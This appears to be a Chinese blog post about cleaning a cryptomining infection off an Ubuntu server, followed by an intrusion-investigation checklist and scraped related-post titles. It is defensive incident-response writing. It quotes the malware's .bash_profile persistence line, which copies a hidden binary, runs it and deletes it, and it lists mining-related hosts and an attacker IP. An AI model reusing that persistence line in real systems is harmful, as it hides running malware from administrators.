环景:

Ubuntu16.04.06 LTS

问题描述:

-bash 进程占用cpu很高,别的进程开启运行过后就被它killed,-bash一直占用50%的CPU,服务器被拉的嗷嗷叫

解决方案:

1.netstat -antlp|grep -e -bash -e rsync 查看进程通信信息**

与外国157.245.164.26地址通信

htop

2.root@ps-SYS-4028GR-TR:/# crontab -l 查看计划任务

  • /dev/shm/.bash/bash

删除crontab任务:crontab -r

3.ls -l /proc/28505/exe #28505为当时进程号 查看进程位置
lrwxrwxrwx 1 root root 0 Nov 5 13:04 /proc/28505/exe -> /usr/bin/-bash (deleted)
显示的是这个样子 exe -> /usr/bin/-bash (deleted) 表示在运行已经被删除,是刻意隐藏代码的一种手段

进程和文件定时任务清除后,还是会隔一段时间自动开启
继续检查

4.查看环境变量.bash_profile时发现存在异常:

root@ps-SYS-4028GR-TR:~# cat .bash_profile 查看环境变量
cp -f -r – /bin/bprofr /bin/-bash 2>/dev/null && /bin/-bash -c >/dev/null 2>&1 && rm -rf – /bin/-bash 2>/dev/null

5.发现木马文件/bin/bprofr

删除,rm –rf /bin/bprofr,执行时报如下错误:
rm –rf /bin/bprofr : Operation not permitted

root@ps-SYS-4028GR-TR:/bin# lsattr bprofr 查看文件属性
----ia-------e-- bprofr
root@ps-SYS-4028GR-TR:/bin# chattr -ia bprofr 去除属性
root@ps-SYS-4028GR-TR:/bin# rm -rf bprofr 删除文件
继续观察观察····

6.开机脚本文件
cat /etc/rc.local

才消停几个小时,又发作
查看bin目录下5个文件,-bash(大爷)、 initdr、 sysdr、 bprofr(之前已经删了)、 crondr,这5大包工头黑壳工具,4个都是属于uucps组

在这期间一不留神误删了正常bash,欲哭无泪····
恢复文章

6.删除5大包工头和环境变量(提示没有权限,更改权限再删除)
root@ps-SYS-4028GR-TR:~# vi .bash_profile
提示没有权限
[7]+ Stopped vi .bash_profile
root@ps-SYS-4028GR-TR:~# lsattr .bash_profile
----ia-------e-- .bash_profile
root@ps-SYS-4028GR-TR:~# chattr -ia .bash_profile
root@ps-SYS-4028GR-TR:~# vi .bash_profile
root@ps-SYS-4028GR-TR:~# cat .bash_profil

把这些文件导出用火绒扫了下,360扫不出

入侵排查整理

  1. 定时任务排查

定时任务crontab是挖矿病毒都会用到的东西,所以定时任务一定要看。

1.crontab-l #列出所有的定时任务

2.crontab -r #删除所有的定时任务,可能会删除我们自己的配置信息,不推荐使用

3.crontab -e #编辑crontab文件

一些需要关注的定时任务文件

1./var/spool/cron/* #centos的

2./var/spool/cron/crontabs/* #ubuntu的

3./var/spool/anacron/*

4./etc/crontab

5./etc/anacrontab #异步定时

6./etc/cron.hourly/*

7./etc/cron.daily/*

8./etc/cron.weekly/

9./etc/cron.monthly/*

  1. 用户密码

排查/etc/passwd

1.cat/etc/passwd #查看密码文件上一次修改的时间,如果最近被修改过,那就可能存在问题。

2.cat /etc/passwd | grep-v nologin #查看除了不可登录以外的用户都有哪些,有没有新增的

3c.at /etc/passwd | grepx: 0#查看哪些用户为root权限,有没有新增的

4.cat /etc/passwd | grep/bin/bash#查看哪些用户使用shell

  1. 导出操作记录

如果攻击者没有删除造作记录,我们可以从操作记录中发现一些我们想要的东西

1.exportHISTTIMEFORMAT= "%F %T whoami "#设置history显示时间和用户名

2.history> /home/xxx/history.log

  1. 日志

日志总是能发现一些蛛丝马迹,所以日志也同样重要。存放在/var/log目录下的东西都认真看一下

1./var/ log/secure #记录安全相关的日志,重点看一下

2./var/ log/btmp #登陆失败的日志记录

3.lastb -f btmp-2020xxxx #可以查看过去的某个登录失败记录 last -f /var/log/btmp | more

4./var/ log/wtmp #登陆成功的日志记录 last -f /var/log/wtmp | more

5.wtmp和btmp只能使用 last和lastb命令查看,不能直接打开看内容的

6./var/ log/yum.log #安装记录,我们可以看一下最近有没有安装一些特殊的依赖库什么的

  1. 进程排查

1.top 命令可以直接清除看到实施情况。

2.ps aux --sort=pcpu | head -10#查看cpu占用率前十的进程,有时候可以发现top发现不了的东西

3.ls -l /proc/*/exe | grep xxx #如果我们知道恶意程序的启动文件大致位置,可以使用这个发现无文件的恶意进程

  1. 域名hosts

有一些挖矿程序会修改 /etc/hosts文件,请看一下其中内容是否被更改过

前两天在另外的项目组上发现的某个挖矿病毒就会修改hosts文件

这是从那台服务器上提取的一些恶意的配置内容

10 .0.0.0aliyun.one

20 .0.0.0lsd.systemten.org

30 .0.0.0pastebin.com

40 .0.0.0pm.cpuminerpool.com

50 .0.0.0systemten.org

  1. 网络连接

有时候我们通过网络连接发现有些IP很可以,就可以通过ip找到进程发现问题。

1netstat-antlp | grep x.x.x.x | awk ‘{print $7}’ | cut -f1 -d “/”#获取存在某ip的进程id号

Ubuntu16.04.06 LTS -bash 进程占用cpu很高,中了挖矿病毒相关推荐

  1. memcached 如果进程占用cpu很高

    memcached 如果进程占用cpu很高 一客户占用到了 25% 把mencache内存大小从32m 改成256m 后 memcached 基本占用cpu 是0 可能分配的内存不够用了  大量的新缓 ...

  2. vs code1.61.1 任务管理器里出现2个rg进程占用cpu很高电脑运行卡

    环景: win10专业版 vs code v.1.61.1 问题描述: 任务管理器里出现2个rg进程占用cpu很高,电脑卡 解决方案: vs code软件里打开文件->首选项->设置搜se ...

  3. redis进程占用CPU很高-达到100

    问题说明: 监控发现,redis进程占用CPU很高-达到100%.并且会有2个redis进程.如下图: 分析了一下,因为redis在持久化保存的时候,会fork出一个进程来.仔细观察进程号PID,会发 ...

  4. 【Windows笔记】-----任务管理器发现 NT Kernel System 进程占用CPU很高

    两个月前win10更新之后就发现系统用起来没以前流畅了,后来也没怎么去优化. 电脑也没装游戏之类的软件,但这两天突然发现电脑管家老显示CPU占用95%以上,内存占用86%以上(总内存12G),情况不对 ...

  5. 服务器被挖矿入侵,进程 command为ld-linux-x86-64占用cpu很高,解决经历

    问题发现: 测试服务器看到 ld-linux-x86-64的进程占用cpu极高,user 是 oracle的. 测试环境不会有这么高的oracle负载.区块链技术盛行,让人不得不怀疑被抓去做矿机了. ...

  6. linux下查找java进程占用CPU过高原因

    linux下查找java进程占用CPU过高原因 1. 查找进程 top查看进程占用资源情况 明显看出java的两个进程22714,12406占用过高cpu. 2.查找线程 使用top -H -p &l ...

  7. Microsoft Compatibility Telemetry进程占用CPU过高如何解决?

    知识点分析: Win10使用中,发现Microsoft Compatibility Telemetry进程占用CPU过高,导致机器卡顿. Microsoft Compatibility Telemet ...

  8. ubuntu nautilus 占用CPU很高

    ubuntu nautilus 占用CPU很高 系统是ubuntu 16.04 不知道从什么时候开始,nautilus无缘无故占用CPU内存很高,导致电脑经常卡. 网上说是Templates文件夹里面 ...

  9. linux php cpu,查找linux下进程占用CPU过高的原因,以php-fpm为例

    很多时候,线上服务器的进程在某时间段内长时间占用CPU过高,为了优化,我们需要找出原因. 1.找出占用CPU最高的10个进程 ps aux | sort -k3nr | head -n 10 或查看占 ...

最新文章

  1. linux 权限 775 777 区别
  2. linux查看oracle的sga设置,Oracle基础教程之设置系统全局区SGA命令
  3. Android O: View的绘制流程(三):布局和绘制
  4. [PHP] 三种运行模式 ISAPI模式 APACHE2HANDLER模式 CGI模式 FastCGI模式
  5. 2.两数相加 golang
  6. C++学习——抽象类
  7. mysql8.0安装问题
  8. 【Level 08】U07 Mixed Feelings L3 I just want to have fun
  9. FLEX Tree动态获得信息时遇到的问题总结
  10. 四川专科学校排名四川计算机,四川省现代计算机职业学院2020年排名
  11. Oracle11g创建表空间、创建用户、角色授权、导入导出表以及中文字符乱码问题
  12. 安卓手机清楚内置X5浏览器缓存
  13. 树莓派学习路程No.1 树莓派系统安装与登录 更换软件源 配置wifi
  14. spss进行相关性分析
  15. 从ghost映像.gho文件快速创建vmware虚拟机
  16. 51单片机控制动态数码管的显示
  17. 使用函数调用 输出三个数中的最大值,最小值
  18. android 一分钟倒计时动画,Android利用属性动画自定义倒计时控件
  19. leetcode/求平方根
  20. 大数据与云计算——牛客网大数据面试问题总结

热门文章

  1. android 使用shape自定义圆角矩形
  2. 应用程序正常初始化(0xc00000ba)失败修复工具
  3. Springer Latex 引用参考文献在overleaf上显示问号[?]
  4. java Integer常用方法详解
  5. 区块链大规模应用“补位”开始了
  6. 电路分析第二章 戴维南、诺顿以及置换定理
  7. C++ 多线程:std::future
  8. 用DELPHI语言怎么实现发短信功能
  9. 批量分析德邦物流,查询送达时间与官网同步
  10. Qcom平台 Camera 之调试单刷验证